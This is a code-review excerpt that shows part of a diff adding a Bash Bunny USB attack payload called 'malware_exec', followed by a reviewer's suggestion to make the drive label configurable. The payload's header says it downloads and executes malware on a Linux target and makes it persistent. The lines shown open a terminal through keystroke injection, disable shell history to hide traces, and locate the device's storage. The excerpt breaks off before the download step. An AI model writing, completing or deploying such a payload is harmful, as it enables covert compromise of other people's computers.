payloads/library/execution/malware_exec/payload.txt

```diff
@@ -0,0 +1,68 @@
+# Title: malware_exec
+# Description: malware_exec fetches malware hosted on Internet and executes it on targets system. malware_exec can make malware persistent and can autorun.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
```

Comment:
Similar to your other payload, I would recommend using a variable assignment for the drive label as not everyone's configuration will have the default `BashBunny`  drive label. This makes user configuration much easier. 

You can do this by adding it to the top of your payload. For example with line: 
```
DRIVE_LABEL="BashBunny"
Q STRING disk='$(lsblk -fs | grep '"$DRIVE_LABEL"' | awk '\''{print $1}'\)''
```